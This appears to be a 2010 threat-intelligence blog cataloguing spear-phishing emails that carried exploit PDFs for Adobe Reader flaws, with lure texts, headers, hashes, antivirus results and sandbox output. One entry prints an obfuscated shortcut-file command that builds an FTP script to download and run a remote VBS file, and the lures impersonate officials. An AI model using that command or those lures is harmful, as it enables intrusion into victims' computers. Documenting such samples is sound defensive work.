Jan 13 CVE-2009-4324 Re: Project from spoofed [Redacted]@state.gov 13 Jan 2010 06:17:21 -0000

• CVE-2009-4324 Use-after-free vulnerability in the Doc.media.newPlayer method in Adobe Reader and Acrobat 8.0 through 9.2, and possibly earlier versions, allows remote attackers to execute arbitrary code using ZLib compressed streams, as exploited in the wild in December 2009.  

Download  116d92f036f68d325068f3c7bbf1d535 - Project.pdf as a password protected archive (please contact me if you need the password)

• Details: 116d92f036f68d325068f3c7bbf1d535 - Project.pdf

Update Jan. 22, 2010 - CW Sandbox analysis kindly provided by TarunKumar Singh (below)

 -----Original

Message-----
From: XXXXX (Real name here)

[mailto:XXXXXX@state

.gov]
Sent: 2010-01-13 1:17
AM
To: XXXXXX
Subject: Re: Project
Importance: High

Dear

I will bring your email
to his attention at
that time.

With regards,
Lesley Rich

Header:

Received: (qmail 6296 invoked from network); 13 Jan 2010 06:17:21 -0000
Received: from unknown (HELO state.gov) (115.92.107.178)
  by XXXXXXXXXXX
Received: from ¼òÌå²âÊÔ (unknown [192.168.7.110])
    by 192.168.7.110 (Coremail) with SMTP id _bJCALesoEAeAFMU.1
    for XXXXXXXXXXXXX Wed, 13 Jan 2010 14:17:15 +0800 (CST)
X-Originating-IP: [192.168.7.110]
Date: Wed, 13 Jan 2010 14:17:15 +0800
From: "=?GB2312?B?QnJlbW5lciwgU3VlIEw=?="
Subject: =?GB2312?B?UmU6IFByb2plY3Q=?=
To: XXXXXXXXXXXXXXXXXXX
X-Priority: 1
X-mailer: FastMail 1.5 [cn]
Mime-Version: 1.0
Content-Type: multipart/mixed;
    boundary="------=_Next_Part_0019055250.467"


Hostname: 115.92.107.178
ISP: LG DACOM Corporation
Organization: LG DACOM Corporation
Type: Cable/DSL
Country: Korea, Republic of  
State/Region: 11
City: Seoul
Latitude: 37.5664
Longitude: 126.9997

This file was already analyzed
 http://www.virustotal.com/analisis/ac3849e1c3ddf124f17c2ed7e8d3463fda2a37116d711a99b82c743c0c1a32ac-1263106258

http://www.virustotal.com/analisis/ac3849e1c3ddf124f17c2ed7e8d3463fda2a37116d711a99b82c743c0c1a32ac-1263938027

 File Project.pdf received on 2010.01.19 21:53:47 (UTC)
Result: 18/41 (43.90%)
a-squared 4.5.0.50 2010.01.19 Exploit.JS.Pdfka!IK
Authentium 5.2.0.5 2010.01.19 PDF/Expl.FO
BitDefender 7.2 2010.01.19 Exploit.PDF-JS.Gen
CAT-QuickHeal 10.00 2010.01.19 Expoit.PDF.FlateDecode
ClamAV 0.94.1 2010.01.19 Exploit.PDF-9757
Comodo 3640 2010.01.19 UnclassifiedMalware
DrWeb 5.0.1.12222 2010.01.19 Exploit.PDF.687
eSafe 7.0.17.0 2010.01.19 Win32.Pidief.H
F-Secure 9.0.15370.0 2010.01.19 Exploit.PDF-JS.Gen
GData 19 2010.01.19 Exploit.PDF-JS.Gen
Ikarus T3.1.1.80.0 2010.01.19 Exploit.JS.Pdfka
Kaspersky 7.0.0.125 2010.01.19 Exploit.JS.Pdfka.adn
McAfee-GW-Edition 6.8.5 2010.01.19 Heuristic.BehavesLike.PDF.Shellcode.Z
Microsoft 1.5302 2010.01.19 Exploit:JS/Heapspray
nProtect 2009.1.8.0 2010.01.19 Exploit.PDF-JS.Gen.C02
PCTools 7.0.3.5 2010.01.19 Trojan.Pidief
Symantec 20091.2.0.41 2010.01.19 Trojan.Pidief.H
TrendMicro 9.120.0.1004 2010.01.19 TROJ_PDFKA.AK
Additional information
File size: 149706 bytes
MD5   : 116d92f036f68d325068f3c7bbf1d535

 Vicheck.ca has this file under a different name already
https://www.vicheck.ca/md5query.php?hash=116d92f036f68d325068f3c7bbf1d535
 kernel32, ExitProcess, Javascript obfuscation using unescape, , Javascript obfuscation using unescape, , Javascript possible obfuscation using unescape, , PDF Exploit call to media.newPlayer, , , ,

Wepawet
http://wepawet.iseclab.org/view.php?hash=116d92f036f68d325068f3c7bbf1d535&type=js
File Project.pdf
Analysis Started 2010-01-19 14:15:12
Report Generated 2010-01-19 14:16:24
Jsand 1.03.02 benign


Here is CW Sandbox analysis kindly provided by TarunKumar Singh

Created Files...

• File: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\1.exe
• File Type: file
• Source File Hash: 88fd19e48625e623a4d6abb5d5b78445
• Creation/Distribution: CREATE_ALWAYS
• Desired Access: FILE_ANY_ACCESS
• Share Access: FILE_SHARE_WRITE
• Flags: FILE_ATTRIBUTE_NORMAL SECURITY_ANONYMOUS
• Stored as: 88fd19e48625e623a4d6abb5d5b78445.exe

• File: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ÄêÙR×´.pdf
• File Type: file
• Source File Hash: dc0a02619771b5d2d0887267c67b87a6
• Creation/Distribution: CREATE_ALWAYS
• Desired Access: FILE_ANY_ACCESS
• Share Access: FILE_SHARE_WRITE
• Flags: FILE_ATTRIBUTE_NORMAL SECURITY_ANONYMOUS
• Stored as: dc0a02619771b5d2d0887267c67b87a6.pdf
  
  Store Created Files Section...
  
  
  
  
  • Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\1.exe (36974 Bytes.)
  • Destination: 88fd19e48625e623a4d6abb5d5b78445.exe

  • Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ÄêÙR×´.pdf (57536 Bytes.)
  • Destination: dc0a02619771b5d2d0887267c67b87a6.pdf
  
  
  
  
  

        Registrey Section...

• Created Keys...
  
  
  
  
  • Key: HKEY_LOCAL_MACHINE\System\WSZXSGANXFJVAYSXYQGNXKQY
  
  
  
  
  

• Open Keys...
  
  
  
  
  • Key: HKEY_LOCAL_MACHINE\SOFTWARE\Adobe\Acrobat Reader\8.0\ORO

  • Key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters
  
  

Jan. 13 CVE-2009-4324 The Chinese Navy's Budding Overseas Presence from trevor.yancey@gmail.com Wed, 13 Jan 2010 22:25:33 +0800

• CVE-2009-4324 Use-after-free vulnerability in the Doc.media.newPlayer method in Adobe Reader and Acrobat 8.0 through 9.2, and possibly earlier versions, allows remote attackers to execute arbitrary code using ZLib compressed streams, as exploited in the wild in December 2009. 

• Details 214f524a7721501e561046a384ba4916 -wm_2752.pdf

Download wm_2752.pdf as 214f524a7721501e561046a384ba4916 -wm_2752.zip (Password protected archive, please contact me if you need it)

 Wed, 13 Jan 2010 22:25:33 +0800

From: Dean Cheng [mailto:trevor.yancey@gmail.com]
Sent: Wednesday, January 13, 2010 9:26 AM
To: XXXXXXXXXXXXXXXXXXX
Subject: The Chinese Navy's Budding Overseas Presence

As 2009 drew to a close, a senior Chinese naval officer raised the idea that the People's Republic of China (PRC) might be interested in establishing a permanent base in the Gulf of Aden area in support of anti-piracy missions. Admiral Yin Zhuo, a senior researcher at the Chinese People's Liberation Army Navy (PLAN) Equipment Research Center, suggested that such a base would facilitate a sustained Chinese presence in the region as part of ongoing anti-piracy efforts.
A base in the Gulf of Aden area would constitute the first formal Chinese overseas military base. It reflects China's growing overseas interests, as well as its expanding military capabilities, including a growing ability to operate far from its shores.
For the United States, the extended Chinese naval deployment in the Gulf of Aden, as well as discussion of the creation of a Chinese naval base in the region, should serve as a reminder that the U.S. Navy will encounter the PLAN more and more--and not solely in the Taiwan Straits, South China Sea, and other waters off China's coast. Given the global nature of China's economic interests, it is inevitable that the Chinese military will also have a more global presence. Nor is there anything that the United States can reasonably do to prevent this.
Rather than trying to forestall the inevitable, U.S. policymakers should recognize the Chinese competitive potential and stay ahead of the game even as the U.S. tries to manage China's emergence to its own advantage. This will entail three key initiatives.
Please find the attached for more detail. Should you have any question, let me know.
Best Regards,
--
Dean Cheng
Research Fellow
Asian Studies Center
The Heritage Foundation
--
Dean Cheng
Research Fellow
Asian Studies Center
The Heritage Foundation
--
Dean Cheng
Research Fellow
Asian Studies Center
The Heritage Foundation
--
Dean Cheng
Research Fellow
Asian Studies Center
The Heritage Foundation
--
Dean Cheng
Research Fellow
Asian Studies Center
The Heritage Foundation

I guess, someone got carried away with paste command (M)
  

Jan 11 CVE-2009-0927 CVE-2008-2992 China and Human Rights from jnfrlews@yahoo.com 2010.01.12 06:24:41 (UTC)

• CVE-2009-0927  Stack-based buffer overflow in Adobe Reader and Adobe Acrobat 9 before 9.1, 8 before 8.1.3 , and 7 before 7.1.1 allows remote attackers to execute arbitrary code via a crafted argument to the getIcon method of a Collab object, a different vulnerability than CVE-2009-0658.

• CVE-2008-2992 Stack-based buffer overflow in Adobe Acrobat and Reader 8.1.2 and earlier allows remote attackers to execute arbitrary code via a PDF file that calls the util.printf JavaScript function with a crafted format string argument, a related issue to CVE-2008-1104.

Download ChinaHR.pdf as AAF477AF8CFB73C6BD9945C5BE403FE9-ChinaHR.zip (password protected, please contact me for the password)

Details: AAF477AF8CFB73C6BD9945C5BE403FE9 - ChinaHR.pdf

From: Jennifer Lewis [mailto:jnfrlews@yahoo.com]
Sent: Monday, January 11, 2010 10:32 PM
To: XXXXXXXXXXXX
Subject: China and Human Rights

China's lack of political freedoms
Opinion towards China brings mixed agendas
China's poor attempt to deflect attention
Resentment of Chinese economic policy not benefiting locals
Lack of international unity, despite statements by media and world leaders
China's actions fuels the very thing it says it tries to fight
China and Africa; concerns over rights and exploitation
More information...

File ChinaHR.pdf received on 2010.01.12 06:24:41 (UTC)
The message sender was
    jnfrlews@yahoo.com
The message originating IP was 68.142.206.41 The message recipients were
XXXXXXXXXXXXX
The message was titled China and Human Rights The message date was Mon, 11 Jan 2010 19:31:56 -0800 (PST) The message identifier was <54825.40062.qm@web113916.mail.gq1.yahoo.com>
attach/5963841_3X_PM5_EMS_MA-PDF__ChinaHR.pdf: Infected: Exploit.Win32.Pidief.bxf [AVP]

Virustotal
http://www.virustotal.com/analisis/b0c7da5ae8e22caeed88008c7847927a19fec7dd659746f6a124b08e3f95547b-1263277481

Result: 13/40 (32.5%)
AntiVir    7.9.1.134    2010.01.11    HTML/Silly.Gen
Antiy-AVL    2.0.3.7    2010.01.11    Exploit/Win32.Pidief
Authentium    5.2.0.5    2010.01.12    PDF/UtlPtf.B!Camelot
Avast    4.8.1351.0    2010.01.11    JS:Pdfka-ME
BitDefender    7.2    2010.01.12    Exploit.PDF-JS.Gen
eSafe    7.0.17.0    2010.01.11    PDF.Exploit
F-Secure    9.0.15370.0    2010.01.12    Exploit.PDF-JS.Gen
GData    19    2010.01.12    Exploit.PDF-JS.Gen
Kaspersky    7.0.0.125    2010.01.12    Exploit.Win32.Pidief.bxf
McAfee-GW-Edition    6.8.5    2010.01.12    Script.Silly.Gen
Sophos    4.49.0    2010.01.12    Troj/PDFJS-BX
Sunbelt    3.2.1858.2    2010.01.12    Exploit.PDF.Pidief (v)
VirusBuster    5.0.21.0    2010.01.11    JS.BOFExploit.Gen
Additional information
File size: 119239 bytes
MD5...: aaf477af8cfb73c6bd9945c5be403fe9


Wepawet
http://wepawet.cs.ucsb.edu/view.php?hash=aaf477af8cfb73c6bd9945c5be403fe9&type=js

Adobe getIcon

Stack-based buffer overflow in Adobe Reader and Acrobat via the getIcon method of a Collab object

CVE-2009-0927

Update January 18, 2010 

jsunpack

Even better results were produced and submitted by Blake (thank you, Blake) using his  jsunpack tool - see  http://jsunpack.blogspot.com.  Utilprintf CVE-2008-2992 was detected in addition to CollabgetIcon CVE-2009-0927.

jsunpack-n$ ./jsunpack-n.py ChinaHR.pdf -V
check line 1371
Processing ChinaHR.pdf
[malicious:10] [PDF] ChinaHR.pdf
       info: [decodingLevel=0] found JavaScript
       info: [decodingLevel=0] decoded 6269 bytes (./files/decoding_

257729096ea832ff72e7365e34062d183d69f2fe)
       malicious: Utilprintf CVE-2008-2992 detected
       malicious: CollabgetIcon CVE-2009-0927 detected
       info: [decodingLevel=1] found JavaScript
       info: saved original parsed JavaScript to ./files/veryverbose_257729096ea832ff72e7365e34062d183d69f2fe
       info: Decoding option app.viewerVersion=8.0,    4012 bytes
       info: Decoding option app.viewerVersion= and app.viewerVersion=9.1,     0 bytes
       info: [decodingLevel=1] decoded 4012 bytes (./files/decoding_93aa0a7dc84a9b7ef6fe87912af5481a0d6a9f4d)
       suspicious: Warning detected //warning CVE-NO-MATCH Shellcode NOP len 9999 //warning CVE-NO-MATCH Shellcode NOP len 506 //warning CVE-NO-MATCH Shellcode NOP len 297 //warning CVE-NO-MATCH Shellcode NOP len 261833
       malicious: shellcode of length 565/295 (./files/shellcode_2b5537e1a69fa16a8c625e0087023c9506002d7e)
       malicious: shellcode of length 551/277 (./files/shellcode_e9f9df40fb0abdc9c6b119423800ca9d0583411c)
       info: [2] no JavaScript
       info: [file] saved ChinaHR.pdf to (./files/original_074517645ec0b7e50bc788910dda51c0e9dcd889)

[file] created ./files/decoding_257729096ea832ff72e7365e34062d183d69f2fe from ChinaHR.pdf
[file] created ./files/veryverbose_257729096ea832ff72e7365e34062d183d69f2fe from ChinaHR.pdf
[file] created ./files/decoding_93aa0a7dc84a9b7ef6fe87912af5481a0d6a9f4d from ChinaHR.pdf
[file] created ./files/shellcode_2b5537e1a69fa16a8c625e0087023c9506002d7e from ChinaHR.pdf
[file] created ./files/shellcode_e9f9df40fb0abdc9c6b119423800ca9d0583411c from ChinaHR.pdf
[file] created ./files/original_074517645ec0b7e50bc788910dda51c0e9dcd889 from ChinaHR.pdf

Jan 10 CVE-2009-4324 Adobe 0 Day with Backdoor:Win32/Bifrose.gen!E payload US-Taiwan Defense Industry Conference 2010 from jswang@gmail.com Sun, 10 Jan 2010 14:05:41 +0800

• CVE-2009-4324 Use-after-free vulnerability in the Doc.media.newPlayer method in Adobe Reader and Acrobat 8.0 through 9.2, and possibly earlier versions, allows remote attackers to execute arbitrary code using ZLib compressed streams, as exploited in the wild in December 2009. 

Download 9cc4133139cac1c774c0bf5476b2ed56 - US-Taiwan Defense Industry Conference 2010.pdf  (password protected archive, please contact me for the password)

• Download the dropped files

sbcdrx.exe - 287EAC0F1F5E9223922EBFF3308F138F,
sbcdrx.dat EC8903129642D3AEF3348B68D17624B5,
SysPr.prx - 4EF40422A092B40000C1FCA20A8D8E44

Details: 9cc4133139cac1c774c0bf5476b2ed56 - US-Taiwan Defense Industry Conference 2010.pdf

The message sender was
  jswang@gmail.com
The message originating IP was 168.95.4.102 The message recipients were
  XXXXXXXXX
The message was titled US-Taiwan Defense Industry Conference 2010 The message date was Sun, 10 Jan 2010 14:05:41 +0800 The message identifier was <004b01ca91ba$f1087b90$9301a8c0@testacb8580da5>
The virus or unauthorised code identified in the email is:
Bloodhound.Exploit.288

Jan 10 CmdExploit 笑到哭出來ㄟ="To cool.. " from sun_yang_ming@yahoo.com Jan10, 2010 5:43 AM

Here is an odd one.  I am just posting it as is.

From: Y.M. SUN [mailto:sun_yang_ming@yahoo.com]
Sent: Sunday, January 10, 2010 5:43 AM
To: 1980connie@pchome.com.tw
Subject: 要冷靜~不能笑出來

哈哈`

我抗到嚕....

超好笑滴((哈`

笑到哭出來ㄟ

_______________________________________
辣茩妏蚚閉湮⺍講捇誥蚘眊
http://cn.mail.yahoo.com


File attachment 笑到哭出來ㄟ.lnk

%COMsPec% /C seT L=O AS&ECHo %J%%L%08%G%^>f>S&eChO %J%aS08^>^>f>>S&ecHo %J%888^>^>F>>s&ecHo %j%Get X X.vbS^>^>F>>S&echO %j%bY^>^>f>>S&seT G=.CoM&ecHO %b%P%m%s:f>>s&eCHo %D%art x.VBS>>S&sEt M= -&Set b=fT&seT j=Echo &ReN s i.bAt&sEt D=St&I.bAt&

Header
Received: from [59.60.183.208] by web51104.mail.re2.yahoo.com via HTTP; Sun, 10 Jan 2010 02:43:24 PST
X-Mailer: YahooMailClassic/9.0.20 YahooMailWebService/0.8.100.260964
Date: Sun, 10 Jan 2010 02:43:24 -0800 (PST)
From: "Y.M. SUN"
Subject: =?utf-8?B?6KaB5Ya36Z2cfuS4jeiDveeskeWHuuS+hg==?=


http://www.robtex.com/ip/59.60.183.208.html#whois
inetnum: 59.56.0.0 - 59.61.255.255
netname: CHINANET-FJ
descr: CHINANET fujian province network
descr: China Telecom
descr: No1,jin-rong Street
descr: Beijing 100032
country: CN
admin-c: CH93-AP
tech-c: CA67-AP

Malware naming

"What's in a name? That which we call a rose
By any other name would smell as sweet."

Romeo and Juliet (II, ii, 1-2) William Shakespeare

 
The Game of the Name. Malware Naming, Shape Shifters and Sympathetic Magic
by David Harley. Director of Malware Intelligence, ESET
 

Jan 7 CVE-2009-4324 Us-J-India_strategic_dialogue from katieedouglas@yahoo.com Thu, 7 Jan 2010 10:07:18 -0800 (PST)

Update 3 See analysis by SANS, Extraexploit and Wh's Behind

• January 14  CVE-2009-4324 Doc.media.newPlayer (Us-J-India_strategic_dialogue.pdf) by Wh's Behind New
• January 14 PDF Babushka by Bojan Zdrnja and Daniel (Wesemann?) - ISC New
• January 12, 2010  Adobe CVE-2009-4324 by extraexploit– Another one with AsciiHexDecode waiting for the patch day -- New

Update2. Please see http://extraexploit.blogspot.com  for a detailed technical analysis

Update1. One of the readers (thanks, Richard) reported that it is heavily obfuscated and exploits CVE-2009-4324 (util.printd()) vulnerability - possibly among other things.

 I don't know yet which CVE it is, but I will look into it later. 


Download 12AAB3743C6726452EB0A91D8190A473   - Us-J-India_strategic_dialogue.pdf (password protected archive, you have to contact me for the password)

Details: 12AAB3743C6726452EB0A91D8190A473   - Us-J-India_strategic_dialogue.pdf

From: Katie Douglas [mailto:katieedouglas@yahoo.com]
Sent: Thursday, January 07, 2010 1:07 PM
To: XXXXXX XXXXXXXX
Subject: Us-J-India_strategic_dialogue

Dear XXXXXXXX,

In the new year there's a new strategy change.Please kindly find the attachment for your reference.

Best Regards,

Katie.

The message sender was
    katieedouglas@yahoo.com
The message originating IP was 76.13.13.79 The message recipients were
    xxxxxxxxxx
The message was titled Us-J-India_strategic_dialogue The message date was Thu, 7 Jan 2010 10:07:18 -0800 (PST) The message identifier was <219808.45632.qm@web114006.mail.gq1.yahoo.com>
The virus or unauthorised code identified in the email is:
attach/5963816_3X_PM5_EMS_MA-OCTET=2DSTREAM__Us=2DJ=2DIndia=5Fstrategic=5Fdialogue.pdf: Infected: Exploit.JS.Pdfka.axx [AVP]

 Virustotal
http://www.virustotal.com/analisis/67602c88edc029808f5d0907b0b0119193968db36e63ed7ce0a13dc324aaa560-1263210461
 File Us-J-India_strategic_dialogue.pdf received on 2010.01.11 11:47:41 (UTC)
Result: 2/40 (5%)
Kaspersky    7.0.0.125    2010.01.11    Exploit.JS.Pdfka.axx
Sophos    4.49.0    2010.01.11    Mal/PDFEx-D
Additional information
File size: 70437 bytes
MD5...: 12aab3743c6726452eb0a91d8190a473

Wepawet
 http://wepawet.cs.ucsb.edu/view.php?hash=12aab3743c6726452eb0a91d8190a473&type=js
File    Us-J-India_strategic_dialogue.pdf
MD5    12aab3743c6726452eb0a91d8190a473
Analysis Started    2010-01-11 04:08:14
Report Generated    2010-01-11 04:11:58
Jsand 1.03.02    benign :(

VMware -When file opened, it just crashes. No text to enjoy.I see no traffic on Wireshark, not yet.

to be continued..

Jan 7 CVE-2009-4324 Special Edition from okazaki1930@yahoo.co.jp Thu, 7 Jan 2010 16:21:46 +0900 (JST)

• CVE-2009-4324 Use-after-free vulnerability in the Doc.media.newPlayer method in Adobe Reader and Acrobat 8.0 through 9.2, and possibly earlier versions, allows remote attackers to execute arbitrary code using ZLib compressed streams, as exploited in the wild in December 2009. 

This post to be continued....

Download  日本の二大政党制.pdf as 55c503e5f160d58f830bb16d5fc1e09c-Special Edition.zip (password protected archive. Please contact me for the password)

-----Original Message-----
From: 岡崎 久彦 [mailto:okazaki1930@yahoo.co.jp]
Sent: Thursday, January 07, 2010 2:10 AM
To: XXXXXXX
Subject: 特別版再送

----- Original Message -----
From: Hisahiko Okazaki [mailto: okazaki1930@yahoo.co.jp]
Sent: Thursday, January 07, 2010 2:10 AM
To: XXXXX

 Subject: resend  Special Edition

The message sender was
    okazaki1930@yahoo.co.jp
The message originating IP was 124.83.212.30 The message recipients were
    XXXXXXXX
The message was titled 特別版再送
The message date was Thu, 7 Jan 2010 16:21:46 +0900 (JST) The message identifier was <20100107072147.17625.qmail@web4210.mail.ogk.yahoo.co.jp>
The virus or unauthorised code identified in the email is:
>>> Possible MalWare 'Exploit/Acroread-CVE-2009-4324' found in
>>> '7913966_1003X_PA2_APDF__pdf_obj_50_0.js'. Heuristics score: 400

Previous scan on Jan 8, 2010 by someone else. Same md5 hash but different name.
http://www.virustotal.com/analisis/c09081111288172b10a4915c3ca3c917f614f0419a93407d8a4e96dc5da78563-1262913422

Two-party system in Japan
 日本の二大政党制.pdf
http://www.virustotal.com/analisis/c09081111288172b10a4915c3ca3c917f614f0419a93407d8a4e96dc5da78563-1263274446
Result: 16/41 (39.03%)
Antivirus     Version     Last Update     Result
a-squared    4.5.0.48    2010.01.12    Exploit.JS.Pdfka!IK
Antiy-AVL    2.0.3.7    2010.01.11    Exploit/JS.Pdfka
Avast    4.8.1351.0    2010.01.11    JS:Pdfka-UQ
BitDefender    7.2    2010.01.12    Exploit.PDF-JS.Gen
ClamAV    0.94.1    2010.01.12    Exploit.PDF-7067
Comodo    3552    2010.01.12    TrojWare.JS.Exploit.Pdfka.azg
F-Secure    9.0.15370.0    2010.01.12    Exploit.PDF-JS.Gen
GData    19    2010.01.12    Exploit.PDF-JS.Gen
Ikarus    T3.1.1.80.0    2010.01.12    Exploit.JS.Pdfka
Kaspersky    7.0.0.125    2010.01.12    Exploit.JS.Pdfka.azg
McAfee    5858    2010.01.11    Exploit-PDF.q.gen!stream
McAfee+Artemis    5858    2010.01.11    Exploit-PDF.q.gen!stream
McAfee-GW-Edition  Heuristic.BehavesLike.PDF.Shellcode.Z
PCTools    7.0.3.5    2010.01.12    HeurEngine.MaliciousExploit
Symantec    20091.2.0.41    2010.01.12    Bloodhound.Exploit.288
Additional information
File size: 1006594 bytes
MD5...: 55c503e5f160d58f830bb16d5fc1e09c

Jan 4 CVE-2009-4324 with Backdoor:Win32/Bifrose.gen!E 研討會]2010 Being Global and Local研討會 from politic@ntu.edu.tw Mon, 4 Jan 2010 15:57:28

• CVE-2009-4324 Use-after-free vulnerability in the Doc.media.newPlayer method in Adobe Reader and Acrobat 8.0 through 9.2, and possibly earlier versions, allows remote attackers to execute arbitrary code using ZLib compressed streams, as exploited in the wild in December 2009. 

• Details: 08b89c0b7949b1d2017356b1bbb75f6a-Being Global and Local_Conference Agenda.pdf

Most likely CVE-2009-1862. Carries Backdoor:Win32/Bifrose.gen!E

After a bit of playing with pdf-parser.py, I think it is CVE-2009-4324. Maybe something else,  you are welcome to check :)  I thought it was CVE-2009-1862 first just based on how some antivirus providers detected it but I was wrong. Wepawet did not detect it as malicious, same situation as Bojan had -see Sophisticated, targeted malicious PDF documents exploiting CVE-2009-4324

I also first got the same error

I think the screenshot below shows that it is CVE-2009-4324

Download pdf 08b89c0b7949b1d2017356b1bbb75f6a-Being Global and Local_Conference Agenda.zip (password protected archive, you need to contact me for the password)

 

Jan. 5 CVE-2009-4324 Adobe 0 Day [NYTimes.com]Large Oil Spill Reported in China from nytimes2010@hotmail.com Tue, 5 Jan 2010 04:58:37 +0000

• CVE-2009-4324 Use-after-free vulnerability in the Doc.media.newPlayer method in Adobe Reader and Acrobat 8.0 through 9.2, and possibly earlier versions, allows remote attackers to execute arbitrary code using ZLib compressed streams, as exploited in the wild in December 2009. 

Download  CVE-2009-4324 samples (Password protected archives. Use the same password you used on the samples above or contact me for the password)

• Details: Large Oil Spill Reported in China.pdf - 490be4598299ca1dc27e9a04351c22ba

The message sender was

    nytimes2010@hotmail.com

The message originating IP was 65.55.34.86 The message recipients were

    XXXX@XXXXX.XXX

The message was titled [NYTimes.com]Large Oil Spill Reported in China The message date was Tue, 5 Jan 2010 04:58:37 +0000 The message identifier was
The virus or unauthorised code identified in the email is:
Bloodhound.Exploit.288
 

From: TYTimes News [mailto:nytimes2010@hotmail.com]
Sent: Monday, January 04, 2010 11:07 PM
To: XXXXX@XXXX.XXX
Subject: [NYTimes.com]Large Oil Spill Reported in China


By DAVID BARBOZA
Published: January 5, 2010

SHANGHAI — A large oil spill in northwest China has heavily polluted a tributary of the Yellow River, and threatens to reach one of the country’s longest and most important sources of water.

China’s state-run news media said late Saturday that a “large amount” of diesel oil had leaked out of a pipeline last Thursday in Shaanxi Province.

...... 
•   NYTIMES.COM
•  For general help questions, please send us an e-mail using this form.
•  Comments or feedback about our Web site? Please send us an e-mail using this form.
•  For a possible correction, or to reach the Web site's editorial staff, you can send an e-mail.
•  For questions about posting comments on the site, there is an FAQ.
•  To reach Martin Nisenholtz, the Sr. V.P. of Digital Operations, you can send an e-mail.

________________________________________
Windows Live: Friends get your Flickr, Yelp, and Digg updates when they e-mail you.

Jan 4 CVE-2009-4324 Adobe 0 Day "Global Views Survey Research Center- President Ma satisfaction poll" from liontai@gmail.com Jan 4, 2010 10:04

• CVE-2009-4324 Use-after-free vulnerability in the Doc.media.newPlayer method in Adobe Reader and Acrobat 8.0 through 9.2, and possibly earlier versions, allows remote attackers to execute arbitrary code using ZLib compressed streams, as exploited in the wild in December 2009. 

Download CVE-2009-4324 samples. (Password protected archive. Use the same password you used on the CVE-2009-4324 samples or contact me for the password)


Details: 200912_GVSRC_others.pdf - 5cdd8b5916c9bceab084c4d569633fa (to be added later..)

From: 戴立安(gmail) [mailto:liontai@gmail.com]
Sent: Monday, January 04, 2010 10:04 PM
To: Undisclosed-Recipient:@yahoo.com
Subject: 遠見民調中心最新調查_「美國與兩岸領導人暨主要政黨信任度、馬總統滿意度」民調
Importance: High

遠見民調中心最新調查結果
 

「美國與兩岸領導人暨主要政黨信任度、
馬總統滿意度」民調

 
--------------------------------------------------------
         遠見雜誌民調中心主任  戴立安
                      Director  Li-an Tai
       Global Views Survey Research Center
          www.gvm.com.tw/gvsrc/index.asp
 
           104 台北市松江路93巷1號
           行動：0916-828-482
           電話：02-2517-3688分機638
           專線：02-2517-8537
           傳真：02-2517-6275
           email：liantai@cwgv.com.tw
                        lion.tai@gmail.com
 --------------------------------------------------------
 遠見.天下文化事業群
 遠見雜誌 * 30雜誌 * 天下文化 * 小天下
 哈佛商業評論--全球中文版 * 大小媒體
 --------------------------------------------------------

Google translation (sorry, it is pretty bad)

From: Dai Lian (gmail) [mailto: liontai@gmail.com]
    Sent: Monday, January 04, 2010 10:04 PM
    To: Undisclosed-Recipient: @ yahoo.com
    Subject: Vision Poll Center _ the latest survey, "the leaders of the United States and cross-strait confidence-cum-major political parties, President Ma satisfaction" poll
    Importance: High

    Vision Center, the latest poll findings
     

    "The U.S. and the major political parties-cum-leaders of both sides trust,
    President Ma satisfaction "poll

             Director, Center for Global Views magazine poll Dai Lian
                          Director Li-an Tai
           Global Views Survey Research Center
              www.gvm.com.tw / gvsrc / index.asp
 
               93, Lane 104, Sung Chiang Road, Taipei No. 1,
               Action :0916-828-482
               Tel :02-2517-3688 ext 638
               Hotline :02-2517-8537
               Fax :02-2517-6275
               email: liantai@cwgv.com.tw
                            lion.tai @ gmail.com
     -------------------------------------------------- ------
     Vision. Commonwealth Business Group
     Journal of Global Views magazine * 30 * Commonwealth * Small world
     Harvard Business Review - Global English Version * the size of the media

Jan 3 2009 CVE-2009-4324 PDF DoD UAS ATC Procedures from matthew.s.allen2@gmail.com Sun, 3 Jan 2010 22:46:25 -0600

CVE-2008-0655 Multiple unspecified vulnerabilities in Adobe Reader and Acrobat before 8.1.2 have unknown impact and attack vectors.  
Update Aug26 (thanks to Jericho - Attrition.org)

CVE-2009-4324 Use-after-free vulnerability in the Doc.media.newPlayer method in Multimedia.api in Adobe Reader and Acrobat 9.x before 9.3, and 8.x before 8.2 on Windows and Mac OS X, allows remote attackers to execute arbitrary code via a crafted PDF file using ZLib compressed streams, as exploited in the wild in December 2009.

Download DoD_UAS_Class_D_Procedures.pdf as 115A25093CB9062CC155508CDF878ACE-DoD_UAS_Class_D_Procedures.zip (password protected archive, please contact me for the password)

From: Allen, Matthew S Maj MIL USAF AF/A3O-AS [mailto:matthew.s.allen2@gmail.com]
Sent: Sunday, January 03, 2010 11:46 PM
Subject: 2009 DoD UAS ATC Procedures


Enclosed are revised ATC procedures for DOD Non-Joint-Use Airfields with associated Class D Airspace to operate DOD Unmanned Aircraft Systems for Service use effective on January 21, 2009. Please feel free to contact COL Robert Hess, who chaired the DOD UAS ATC procedures working group, at (703)806-4862, with any questions.


Signed; 04 Jan 10
Allen, Matthew S Maj
USAF AF/A3O-AS
DSN:703-697-8035

 The message sender was
    matthew.s.allen2@gmail.com
The message originating IP was 209.85.223.196 The message recipients were
xxxxxxxxxxxx
The message was titled 2009 DoD UAS ATC Procedures The message date was Sun, 3 Jan 2010 22:46:25 -0600 The message identifier was <9ae646dc1001032046i4f73e0cl8d6f3751020f0880@mail.gmail.com>
attach/5963820_3X_PM5_EMS_MA-PDF__DoD=5FUAS=5FClass=5FD=5FProcedures=5F=28signed=29.pdf: Infected: Exploit.JS.Pdfka.adn [AVP]


Virustotal
 http://www.virustotal.com/analisis/1769c9eb8fdb4942176ca2172de118df294ae785c03cca70bd6fee0c74dad2ce-1262924110

CVE-2009-4324  - Update Aug 26, 2010

 http://www.virustotal.com/analisis/1769c9eb8fdb4942176ca2172de118df294ae785c03cca70bd6fee0c74dad2ce-1274670528
File DoD_UAS_Class_D_Procedures__signe  received on 2010.05.24 03:09:12 (UTC)
Result: 24/41 (58.54%)
Antivirus     Version     Last Update     Result
a-squared    4.5.0.50    2010.05.10    Exploit.JS.Pdfka!IK
AhnLab-V3    2010.05.23.00    2010.05.22    PDF/Exploit
AntiVir    8.2.1.242    2010.05.23    EXP/Pidief.244965
Authentium    5.2.0.5    2010.05.23    PDF/Expl.GQ
